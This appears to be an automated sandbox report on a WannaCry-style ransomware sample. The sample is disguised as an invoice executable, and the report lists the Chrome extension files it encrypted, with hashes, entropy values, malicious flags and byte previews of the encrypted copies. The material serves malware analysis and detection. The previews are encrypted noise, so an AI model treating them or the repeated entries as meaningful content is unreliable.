                                                          Size (bytes):1048856
                                                          Entropy (8bit):7.99982687688155
                                                          Encrypted:true
                                                          SSDEEP:24576:KBgjcAcw1KVmp5wViqcMocuc1sp7mVCDobtOwhkb0HT1W9mtq:4gj0mKVkMiqP8c6pehkb0Wmtq
                                                          MD5:8D7493BEB6503C2D0ECF14991C18D5E3
                                                          SHA1:95EEC156A4F2115FD702D7F335ADBA729A8457D1
                                                          SHA-256:B2BE7E5FF084D767AC716FB81998C51BC970A6A7016A450E3EB149302C6D6C7D
                                                          SHA-512:67AA8834DC3531906A5EA472736DD82C9BBBBB8E6F2266250D664E15DDBDA1C352471E7752E4C9300B1F8ADB11B34C0DD6EAF2608308ACAA22500273C7A06A44
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....=.8.H,L...ti.....|...b0.U..J....?..8.$.A...O....!e@..7....0R.L.0.2g.....j.}..4.U..............i+{..G..YY.&.,...X.#!...K...56i.8..8...d.Zz..`.I......Q..h.Z?.tVI..e.*...#.../.s.k......=m...g....U7..>...>.?Oho.%...u...jZ..N.C.i7...f..o...y.32\...............I...\I..X.....+.#...1...z...{J.Qh....._J.....!k.p.c#aO.uE.f..{......~...H.l.}..+`qr.&.o5Y....)..I..I."L..F ...D..".2..E..L.Q..l_r...z...g..x..4....ks..pZ~.-.....>7..4.....g>9.......lX.k......[..e.K.7...9y._..n.......q.O>..?.n./..q...j...../...~4....Q.9:.bP...]%.....TS...K...@..ms^N..F....H..2j)(.3.j.......W.. ...5.DO..+(..>....,.(..=.?..k8.1.......f.-..X4.$..x..A.B....W:.&..5...`.... ..3z...M$..c..3..7.t(..[4.z..Or.c/.X6.......x.ei..m...L..t.i..P..Y..Q..1b...."-?.bp..SO.19.t.*.).W.............d]<X...p..A..........{DIt...J..UM.E......gB..x.c'.1..0..O..k....d-..........6..Q........1G.Sv$........M.*[.`.gOT...c..k.......Fb....[..........P......X..\=p.0BJ;.5.!A.m..<"..A"...X~.$-

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_background.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):544936
                                                          Entropy (8bit):7.99963243634618
                                                          Encrypted:true
                                                          SSDEEP:12288:qws05J6xPHFIDU/1tOJ/iSwL0umfUJQaZgcEp2WI:u076ZFM/ivLr6Uma2bp2WI
                                                          MD5:F204E1FEC63618656EAACD52FD302AC4
                                                          SHA1:BAB16916E3DEBC769C822A7BB58D2C8AF13D3705
                                                          SHA-256:A582FDC049E2D29F1DFCC3ADBBA755FE03F8F514A01400DF82D6C3D2185C51E2
                                                          SHA-512:C77E2245BB4A0FD2D4A185A0662D26D653CABB407745EF13DA7FB17FA0DDF2D7B4F2AE3F02742D3E5F5EC3C17E613D54AE97A1BF41AE5B529DF3F071C69109FE
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......N%c+ImZ..Y.M.G8$....^.Z...oR..b.P<...*j..?"8..O ..Q,\..@kyp....7iyb....t.3T..V....0....jm.q;.p....n.^K.^o...p...K~.;....@.......c.F.....pq`.,.IN(..s.bW.:...e....].].'_.9..g....V....D...0R.EPN_.x...;.62.U.l..D...-.Ew.(._.P....k....**(..7.....O........*f9..RW.A..$.....'.....(...]..K....F..z...+...$C.........w....n.\.S..nq!.T..s%.Tt.=...Z.x.m. )S.I.{.............CE.3.... ..Ov7h1.......|WJ...w...n.D6G.T.:.a.....v-......L.RJ\O.5I.WHb.....K.]...+.:=..9.y..6.w.p=......y.G..V.#.....ZE^..\...y.f..g.>....T|!b...4.F...xO..J.A.T5....J.h.S..k..`......r..9.E_i.:(..?.R w.{;.%...!...*R...v....8....|B.....kVD{..r-/..@[s....<dB...X.\."/...E...6d...D.zL.D...ep..@L...[.J......Z...@..P.N.....-..}.......... ...3m.qClNU;.Y$...7.}.G.. ..z}...I./..2.`..g......p.....Q.....c,.0.:.....~..O..V..1P..6e:dn..W...$._&.......?...e)..)1)....^.S.A+..>.g\k..W,.+....ZYM'...6..../+.......q..'r..=...-j.5R.{6.#..4.:._.._..[ad%4...I.q..s..1.c].'s.dv...=.....g.L#%..U...E

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_background.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):544936
                                                          Entropy (8bit):7.99963243634618
                                                          Encrypted:true
                                                          SSDEEP:12288:qws05J6xPHFIDU/1tOJ/iSwL0umfUJQaZgcEp2WI:u076ZFM/ivLr6Uma2bp2WI
                                                          MD5:F204E1FEC63618656EAACD52FD302AC4
                                                          SHA1:BAB16916E3DEBC769C822A7BB58D2C8AF13D3705
                                                          SHA-256:A582FDC049E2D29F1DFCC3ADBBA755FE03F8F514A01400DF82D6C3D2185C51E2
                                                          SHA-512:C77E2245BB4A0FD2D4A185A0662D26D653CABB407745EF13DA7FB17FA0DDF2D7B4F2AE3F02742D3E5F5EC3C17E613D54AE97A1BF41AE5B529DF3F071C69109FE
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......N%c+ImZ..Y.M.G8$....^.Z...oR..b.P<...*j..?"8..O ..Q,\..@kyp....7iyb....t.3T..V....0....jm.q;.p....n.^K.^o...p...K~.;....@.......c.F.....pq`.,.IN(..s.bW.:...e....].].'_.9..g....V....D...0R.EPN_.x...;.62.U.l..D...-.Ew.(._.P....k....**(..7.....O........*f9..RW.A..$.....'.....(...]..K....F..z...+...$C.........w....n.\.S..nq!.T..s%.Tt.=...Z.x.m. )S.I.{.............CE.3.... ..Ov7h1.......|WJ...w...n.D6G.T.:.a.....v-......L.RJ\O.5I.WHb.....K.]...+.:=..9.y..6.w.p=......y.G..V.#.....ZE^..\...y.f..g.>....T|!b...4.F...xO..J.A.T5....J.h.S..k..`......r..9.E_i.:(..?.R w.{;.%...!...*R...v....8....|B.....kVD{..r-/..@[s....<dB...X.\."/...E...6d...D.zL.D...ep..@L...[.J......Z...@..P.N.....-..}.......... ...3m.qClNU;.Y$...7.}.G.. ..z}...I./..2.`..g......p.....Q.....c,.0.:.....~..O..V..1P..6e:dn..W...$._&.......?...e)..)1)....^.S.A+..>.g\k..W,.+....ZYM'...6..../+.......q..'r..=...-j.5R.{6.#..4.:._.._..[ad%4...I.q..s..1.c].'s.dv...=.....g.L#%..U...E

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_window.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):261608
                                                          Entropy (8bit):7.999403800781675
                                                          Encrypted:true
                                                          SSDEEP:6144:HVpJcd4NOeZV6CMTC04TTSS510+p53WTqxiLuaR6sY+g+zlT91:HVpmdEsCrPp1bpRcqkR6slzhj
                                                          MD5:754EABE869C1F1B193F81B1ADA2B65F6
                                                          SHA1:AA1ADC136B26092F2D13EA365ED24205F9E1E868
                                                          SHA-256:F934097042514DB515E61C93E69AEBDB1AC397DA27B36E671CAFD43358BBD2D3
                                                          SHA-512:DE4F61CA5A851274D241BDAB9F228FFD856B80EF4C0B2B2BCE0C76EEAD979866D08AEA5DEA883D45C6BB786E78D0927B6ADCD669212F4A62CEB982E422417BDE
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......e..2..v.......b....Y....E.k"]..n.-^....e,.FG..H..v..N..C..m../....S7a......mz..(.F...5.};...&f..6..&C..o...JD...`...P.............y `h....[....c....y.Cx.-q.......V.....`b+C.PO..~..fj..ip.-Qv 4...s..qOfP..........9N....$uD.&.5.y..w.n.1.....5-..7.............>.6...T.ZC.2.....2...."...s.kPf;.g..HC.$..g..+...~.q.4..~...P...J.O.I..Gy.......34.:c...(+.k...............z...A....A..Z& <..ERC:.I.....O....BF.u.......g.^....A(.".U.\*.|..'.....8..WW. h^.|Ma...^.i...{.....nP.+.1P..~..........$.K.....Zu....l...B....96.. .8..y....}.j.YL?..+.P....7..S[s.n.8fV.+W...C)...E..... ..,r.iM..{.n%..[tc..C......9..#Wd5..q.V....-.B.fLzr/.......W.td..1...G}........#....=. ...rr..6`.m.....}K.@u.0o#*J$..xY?..J.b.....u.....|.L.A*Xr..z.d$..v...R.....9.'..F...{%.....%S$.......O(Az..p..........|.62.b...9...+..._..W..9..w..&U.Pqt.....h....]q>..s`..LVG...|..bO.(M....z..p:*.0.GX.b2.8.=6..%.....2......WU.)Y..W..K.4v789..d..j..:..y....y..V.%~'....e....-.P5.W.......

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_window.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):261608
                                                          Entropy (8bit):7.999403800781675
                                                          Encrypted:true
                                                          SSDEEP:6144:HVpJcd4NOeZV6CMTC04TTSS510+p53WTqxiLuaR6sY+g+zlT91:HVpmdEsCrPp1bpRcqkR6slzhj
                                                          MD5:754EABE869C1F1B193F81B1ADA2B65F6
                                                          SHA1:AA1ADC136B26092F2D13EA365ED24205F9E1E868
                                                          SHA-256:F934097042514DB515E61C93E69AEBDB1AC397DA27B36E671CAFD43358BBD2D3
                                                          SHA-512:DE4F61CA5A851274D241BDAB9F228FFD856B80EF4C0B2B2BCE0C76EEAD979866D08AEA5DEA883D45C6BB786E78D0927B6ADCD669212F4A62CEB982E422417BDE
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......e..2..v.......b....Y....E.k"]..n.-^....e,.FG..H..v..N..C..m../....S7a......mz..(.F...5.};...&f..6..&C..o...JD...`...P.............y `h....[....c....y.Cx.-q.......V.....`b+C.PO..~..fj..ip.-Qv 4...s..qOfP..........9N....$uD.&.5.y..w.n.1.....5-..7.............>.6...T.ZC.2.....2...."...s.kPf;.g..HC.$..g..+...~.q.4..~...P...J.O.I..Gy.......34.:c...(+.k...............z...A....A..Z& <..ERC:.I.....O....BF.u.......g.^....A(.".U.\*.|..'.....8..WW. h^.|Ma...^.i...{.....nP.+.1P..~..........$.K.....Zu....l...B....96.. .8..y....}.j.YL?..+.P....7..S[s.n.8fV.+W...C)...E..... ..,r.iM..{.n%..[tc..C......9..#Wd5..q.V....-.B.fLzr/.......W.td..1...G}........#....=. ...rr..6`.m.....}K.@u.0o#*J$..xY?..J.b.....u.....|.L.A*Xr..z.d$..v...R.....9.'..F...{%.....%S$.......O(Az..p..........|.62.b...9...+..._..W..9..w..&U.Pqt.....h....]q>..s`..LVG...|..bO.(M....z..p:*.0.GX.b2.8.=6..%.....2......WU.)Y..W..K.4v789..d..j..:..y....y..V.%~'....e....-.P5.W.......

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):70648
                                                          Entropy (8bit):7.997319898348123
                                                          Encrypted:true
                                                          SSDEEP:1536:dHYRCZmYM2DmIxQ54I8BS+hChgchOozvRth8wUrz9XH7Wa4x8m:Co3jxGFhxXJD8wG9XbQOm
                                                          MD5:0410CB353EADCF134CF37A5EB3567F38
                                                          SHA1:5E84AA33D4E501A666EB73CFE245C91F85EE4127
                                                          SHA-256:2BCB5BBFA8AFF96AD0932B4F7FB8879D4CDEDC82BCB2594645B4A51262DE4B22
                                                          SHA-512:76F0A1460E1106513F5B90BF8271A566A716471896CCF2015E11E0D4AE98B2AAC52782A48E88D71AFE43F85D82AAE9A828D4CE59C4CDD49CE880CDF15CD226EE
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......c......QwnK.<L.U.>...1..?K.../...C:.N..l..f.8L0...M..Z....a.....T...g...=.7..7.J.....2.;...H<T..vT.Kd."._;f.lo.....%.......<^o(.~..;.flT...7..m..o]..f....jZ0"k..d'..B.Z..6.m.....3Y..?ul......J.(E.S.hP.;......].z.y.Z..L...pw........................0N9._....cu..t.:.....0.Jv.8w..X..Oi..h...[.i7.7..*(.e..j..J...Tt....E|.@......2.0r.5..:x:....._....7^.P..v.<.6.A.......e..x..z..."..m3O9.;y....d........L..0.8.R.2I... nwHB..6.3oz..1.g._.$..P.g...!...G..k.X.............."y..-.'b.../.dU.....,.e3k......0.Q..b."{......j .z.r.L......k.!x.}.k......C...l....G.9y.@k....3..x.,..;.6...U.... L2.+.-.V..."../=.I...0/....X...d$..|^u.*.=....Y...y|jKm.J.....!B.....C.....%../...zCf..ix.........p.y^..Z$-..0k..`..e.Pd..g$........z.7..V(/.N#....<.......Z...{t){.Mq..Q.....Vj.?...r>v.T.=..~{kW.ZKg.]..r.m..!...c.j7..............%..l/A....W.f.......b7^.SJ.@iF.......f.Yd...5i...Y.>....y[..T9....XI...r...{<Bj..|.A`.!...m...F.N4...7<.^/6wr3%.mf.vI.;

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):70648
                                                          Entropy (8bit):7.997319898348123
                                                          Encrypted:true
                                                          SSDEEP:1536:dHYRCZmYM2DmIxQ54I8BS+hChgchOozvRth8wUrz9XH7Wa4x8m:Co3jxGFhxXJD8wG9XbQOm
                                                          MD5:0410CB353EADCF134CF37A5EB3567F38
                                                          SHA1:5E84AA33D4E501A666EB73CFE245C91F85EE4127
                                                          SHA-256:2BCB5BBFA8AFF96AD0932B4F7FB8879D4CDEDC82BCB2594645B4A51262DE4B22
                                                          SHA-512:76F0A1460E1106513F5B90BF8271A566A716471896CCF2015E11E0D4AE98B2AAC52782A48E88D71AFE43F85D82AAE9A828D4CE59C4CDD49CE880CDF15CD226EE
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......c......QwnK.<L.U.>...1..?K.../...C:.N..l..f.8L0...M..Z....a.....T...g...=.7..7.J.....2.;...H<T..vT.Kd."._;f.lo.....%.......<^o(.~..;.flT...7..m..o]..f....jZ0"k..d'..B.Z..6.m.....3Y..?ul......J.(E.S.hP.;......].z.y.Z..L...pw........................0N9._....cu..t.:.....0.Jv.8w..X..Oi..h...[.i7.7..*(.e..j..J...Tt....E|.@......2.0r.5..:x:....._....7^.P..v.<.6.A.......e..x..z..."..m3O9.;y....d........L..0.8.R.2I... nwHB..6.3oz..1.g._.$..P.g...!...G..k.X.............."y..-.'b.../.dU.....,.e3k......0.Q..b."{......j .z.r.L......k.!x.}.k......C...l....G.9y.@k....3..x.,..;.6...U.... L2.+.-.V..."../=.I...0/....X...d$..|^u.*.=....Y...y|jKm.J.....!B.....C.....%../...zCf..ix.........p.y^..Z$-..0k..`..e.Pd..g$........z.7..V(/.N#....<.......Z...{t){.Mq..Q.....Vj.?...r>v.T.=..~{kW.ZKg.]..r.m..!...c.j7..............%..l/A....W.f.......b7^.SJ.@iF.......f.Yd...5i...Y.>....y[..T9....XI...r...{<Bj..|.A`.!...m...F.N4...7<.^/6wr3%.mf.vI.;

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_128.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4648
                                                          Entropy (8bit):7.9595688349112725
                                                          Encrypted:false
                                                          SSDEEP:96:o+7gQLou/yKcReOherqTjVvSRvwx52FcU/c/xkldpddE2aj1Q/b1HbuR0z:gQLB/yL6qTxe8r+uxkldy2aj1QD178K
                                                          MD5:47A1E44885626CBCF23B17288EF41F88
                                                          SHA1:5C07E0721646335C6B99EA1F71E2C0472EDFF926
                                                          SHA-256:DE8882DA1FB1D22F7F41125A70E0E32A7D4702C049785A6C18E265DBEE89FDB3
                                                          SHA-512:AEC172C27C3DED595ED30538C2A785E89F5787EEF1B3DD129257EF237D0FC806EEDBB7D0187B14646FE82BE95F07F5A5B197230BF32FD830048A774F0C214876
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......9....~.CypSj..Eq.U{..a.!.</O.Df.Tp%p'.J..^.U'.).r.t...5._..i4.D...V9.....y... ..;fY.5Q.[......R....!G..5`.h.i.............wV*...g.f.....B. C'.."..?H0....Y..}......Uxb.6}.h..C..b.(.(f#.}.. i..p.-..4........Z..0...k.)&n".q..<..&4..yW..+.Z..c.1.{............r...Ly.....fT"O....$`....b"f.G...&.-A.r65.ZZ...9Q......$j..............k..Y.......CR-(.....e...T..9.k..Ij\...Y..(A.w...;..rN......i.)..C..g.ox.....A..x.......F...D....)..z3.uk...d.OV...(\H.tI..b......2]..O.....+!?.........E.GRt1\...V.7.2...V...k..^3.. .C.t....!fi~...cEt........'(....:..g.......'.d.?xl.lB...Q...A.[y......8.K.c....o..j.w.BGP..C....t....TA.rxnGG...N/2......v../..._T1....x..&.....J.m..3.(.H. &v..q....+t..c_[.@....l....o..j...p...b..[[cF...TL>..1.Iaz.)3aQ.z..-,*....2<.r...s<.....7....4.H.%.."a..@..29....w..D.....)]To.\R.U...A..c................:F.7..p]R..p..J.#.X.-.|@.v.B.w.6.c..v.A4.1...]..`d5>.a.O.u.D..N&.G..p}....H.d.E.(.Nd...w.~.&.9K....on..\..E.....R

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_128.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4648
                                                          Entropy (8bit):7.9595688349112725
                                                          Encrypted:false
                                                          SSDEEP:96:o+7gQLou/yKcReOherqTjVvSRvwx52FcU/c/xkldpddE2aj1Q/b1HbuR0z:gQLB/yL6qTxe8r+uxkldy2aj1QD178K
                                                          MD5:47A1E44885626CBCF23B17288EF41F88
                                                          SHA1:5C07E0721646335C6B99EA1F71E2C0472EDFF926
                                                          SHA-256:DE8882DA1FB1D22F7F41125A70E0E32A7D4702C049785A6C18E265DBEE89FDB3
                                                          SHA-512:AEC172C27C3DED595ED30538C2A785E89F5787EEF1B3DD129257EF237D0FC806EEDBB7D0187B14646FE82BE95F07F5A5B197230BF32FD830048A774F0C214876
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......9....~.CypSj..Eq.U{..a.!.</O.Df.Tp%p'.J..^.U'.).r.t...5._..i4.D...V9.....y... ..;fY.5Q.[......R....!G..5`.h.i.............wV*...g.f.....B. C'.."..?H0....Y..}......Uxb.6}.h..C..b.(.(f#.}.. i..p.-..4........Z..0...k.)&n".q..<..&4..yW..+.Z..c.1.{............r...Ly.....fT"O....$`....b"f.G...&.-A.r65.ZZ...9Q......$j..............k..Y.......CR-(.....e...T..9.k..Ij\...Y..(A.w...;..rN......i.)..C..g.ox.....A..x.......F...D....)..z3.uk...d.OV...(\H.tI..b......2]..O.....+!?.........E.GRt1\...V.7.2...V...k..^3.. .C.t....!fi~...cEt........'(....:..g.......'.d.?xl.lB...Q...A.[y......8.K.c....o..j.w.BGP..C....t....TA.rxnGG...N/2......v../..._T1....x..&.....J.m..3.(.H. &v..q....+t..c_[.@....l....o..j...p...b..[[cF...TL>..1.Iaz.)3aQ.z..-,*....2<.r...s<.....7....4.H.%.."a..@..29....w..D.....)]To.\R.U...A..c................:F.7..p]R..p..J.#.X.-.|@.v.B.w.6.c..v.A4.1...]..`d5>.a.O.u.D..N&.G..p}....H.d.E.(.Nd...w.~.&.9K....on..\..E.....R

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_16.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):840
                                                          Entropy (8bit):7.765115016605481
                                                          Encrypted:false
                                                          SSDEEP:24:bkp8zynzaNfTEQm+RcXP++lLEJtaggXb9XsZ:bkpfpXHXm+lWwd9i
                                                          MD5:4617B6CFE3DF022A3383A6BA1C169BD7
                                                          SHA1:09BEB56005B9B4AE3CB4C4B729E8F96D19C9B962
                                                          SHA-256:C70CD6F6210D6F7F8574C2A1347D01A6577334B41ECF8167AF433393F70B0CE9
                                                          SHA-512:8F4D1357CB25EAA4F6D6CA5B3DBBE2E67C1A8541CD1807AE00F76A5A379726547026062A0D8672E76B2113E7330A213C8745B1D7223539FEF39EC7B30A34CF55
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...../.I.d..G.^..Q......:H...x.1....m.s..D...)?...)...c.E.v.......H.w...?s+3l..i.y...%x.....K.Og...e~k...(...0HRlf...I.T.6....v.K.(..m...v)......@.E3.S4V.<h -.}.S7.(.....k....s.I.Z.......s...M}.H...Ki().Rm..4IY,...-e....zOv}..>.......X..*.[.(..iK.............+....YxVo.F8.s..`.=..VC...&.{Oj..H.Z...|...e.>....A.P.^..Ee..M....B..l.......MN.l....pjT.l.4.nJ...yT.{....G..MI..NS........Vr.j%.m..K.7m..N_..p...%..O7...M9..G\..f.1.m.;)':..*.q.1.07..'.3...[...*...&..K.o/.<].:.qG.O...........w.27.qE"R...=!..}...=x.....u'..Qu.(k.....D..ePazH....R...9`.@.a..9.....6...\....1Hb ...S......d..y..4..1.....$....k.+.3...N....ZJi.K.;.......,...x.?a........al.]..qr..w.E....1=.s.8..}..H.}c..4..m.....i.....K[`1.@.w............J..EU}..z3w...p.....2....3.Jb..4]jf.Jo.........Go)....f~........B..`.a2.F..9.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_16.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):840
                                                          Entropy (8bit):7.765115016605481
                                                          Encrypted:false
                                                          SSDEEP:24:bkp8zynzaNfTEQm+RcXP++lLEJtaggXb9XsZ:bkpfpXHXm+lWwd9i
                                                          MD5:4617B6CFE3DF022A3383A6BA1C169BD7
                                                          SHA1:09BEB56005B9B4AE3CB4C4B729E8F96D19C9B962
                                                          SHA-256:C70CD6F6210D6F7F8574C2A1347D01A6577334B41ECF8167AF433393F70B0CE9
                                                          SHA-512:8F4D1357CB25EAA4F6D6CA5B3DBBE2E67C1A8541CD1807AE00F76A5A379726547026062A0D8672E76B2113E7330A213C8745B1D7223539FEF39EC7B30A34CF55
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...../.I.d..G.^..Q......:H...x.1....m.s..D...)?...)...c.E.v.......H.w...?s+3l..i.y...%x.....K.Og...e~k...(...0HRlf...I.T.6....v.K.(..m...v)......@.E3.S4V.<h -.}.S7.(.....k....s.I.Z.......s...M}.H...Ki().Rm..4IY,...-e....zOv}..>.......X..*.[.(..iK.............+....YxVo.F8.s..`.=..VC...&.{Oj..H.Z...|...e.>....A.P.^..Ee..M....B..l.......MN.l....pjT.l.4.nJ...yT.{....G..MI..NS........Vr.j%.m..K.7m..N_..p...%..O7...M9..G\..f.1.m.;)':..*.q.1.07..'.3...[...*...&..K.o/.<].:.qG.O...........w.27.qE"R...=!..}...=x.....u'..Qu.(k.....D..ePazH....R...9`.@.a..9.....6...\....1Hb ...S......d..y..4..1.....$....k.+.3...N....ZJi.K.;.......,...x.?a........al.]..qr..w.E....1=.s.8..}..H.}c..4..m.....i.....K[`1.@.w............J..EU}..z3w...p.....2....3.Jb..4]jf.Jo.........Go)....f~........B..`.a2.F..9.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):440
                                                          Entropy (8bit):7.430548721712902
                                                          Encrypted:false
                                                          SSDEEP:12:bkE9MvrrcshuIHX33MqlgyS1Tt7T9o73xjXZ:bkGMbhuIH3NgyC7S3JJ
                                                          MD5:172E70949E08D44A6AB9CDCD9D662E7B
                                                          SHA1:199A2D333C267F7EF5D434E91521684929EE54AB
                                                          SHA-256:09253AD4B467E7D2B8199733EBBF89ADD839E91C0C84866E159D9C21ACBBE095
                                                          SHA-512:AD0F429E44BBBF0760DD7D3011541CA0EF0E6A153C921D50B827AB23F5A7A653A8A0822AD5F2F49F3F131CB221151B7298FB0ACC4B5EE0A5CB726AA7CEBD7247
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......ka..3..3w.4.:..h,we".,lf....n3}~&.O.i..~.v..)4S(....I R.4Z..4.6K.;...,...p..V......yI..9.....8=..k.b.P.p.h..3vi.....c....l/.!p.b....~*......G.D.4..B...5....9O..B.\.mI.[.7..E....Z."...ug..)@|Q%.?......R.......uU.T!.e.Ot.+.6S|}..b..<.c....E.............n.n..yB.........88P.7.{..k...B..B.p...N...c.P{.s.|(..s..V....qf.. 2........t?....M.@2.........Q...T.e{.O+c..<E....>Rb.7.O.E..GA....F...[...........\...e4.+

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):440
                                                          Entropy (8bit):7.430548721712902
                                                          Encrypted:false
                                                          SSDEEP:12:bkE9MvrrcshuIHX33MqlgyS1Tt7T9o73xjXZ:bkGMbhuIH3NgyC7S3JJ
                                                          MD5:172E70949E08D44A6AB9CDCD9D662E7B
                                                          SHA1:199A2D333C267F7EF5D434E91521684929EE54AB
                                                          SHA-256:09253AD4B467E7D2B8199733EBBF89ADD839E91C0C84866E159D9C21ACBBE095
                                                          SHA-512:AD0F429E44BBBF0760DD7D3011541CA0EF0E6A153C921D50B827AB23F5A7A653A8A0822AD5F2F49F3F131CB221151B7298FB0ACC4B5EE0A5CB726AA7CEBD7247
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......ka..3..3w.4.:..h,we".,lf....n3}~&.O.i..~.v..)4S(....I R.4Z..4.6K.;...,...p..V......yI..9.....8=..k.b.P.p.h..3vi.....c....l/.!p.b....~*......G.D.4..B...5....9O..B.\.mI.[.7..E....Z."...ug..)@|Q%.?......R.......uU.T!.e.Ot.+.6S|}..b..<.c....E.............n.n..yB.........88P.7.{..k...B..B.p...N...c.P{.s.|(..s..V....qf.. 2........t?....M.@2.........Q...T.e{.O+c..<E....>Rb.7.O.E..GA....F...[...........\...e4.+

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_close.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):536
                                                          Entropy (8bit):7.530288430810619
                                                          Encrypted:false
                                                          SSDEEP:12:bkEQZeEdZvo0JrPO52JSyps+LMrZjizOQ/pVnERDI0nogdID:bk5dZvo0dOUnoZFQ/rKIqoRD
                                                          MD5:BCC771E9CFBE349D357208AE163D02A0
                                                          SHA1:F2E590A420AD008C414E8A17C42E326A46AA2E19
                                                          SHA-256:7FF087189A67196C8E46FAB55EAC689A4C7CFEE566B252DC65CDD74356F7A4D7
                                                          SHA-512:5A0990AD885B630EE7A3C33462C29615BF08432B07E5328739DF5AE92977A8EC0BD40920E7434FB8C75220AD69E9A72701694B41DF74A1769F59C5E5C4AF3845
                                                          Malicious:false
                                                          Reputation:unknown
